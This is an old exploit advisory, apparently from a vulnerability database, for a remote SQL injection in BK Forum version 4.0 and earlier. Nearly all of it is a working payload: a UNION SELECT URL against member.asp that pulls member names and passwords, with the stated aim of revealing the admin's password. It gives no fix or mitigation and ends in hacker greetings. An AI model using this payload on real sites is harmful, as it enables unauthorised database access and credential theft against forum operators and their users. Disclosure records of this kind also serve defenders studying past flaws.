Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12391
HistoryApr 24, 2006 - 12:00 a.m.

BK Forum <= 4.0 Remote SQL Injection

2006-04-2400:00:00
vulners.com
11

BK Forum <= 4.0 Remote SQL Injection

by n0m3rcy

Copyright (c) 2006 n0m3rcy <[email protected]>

Exploit:

First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1&#37;20UNION&#37;20SELECT&#37;201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16&#37;20FROM&#37;20member+where+memID=1

You will find admin's password

Shoutz:

nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00

Have phun!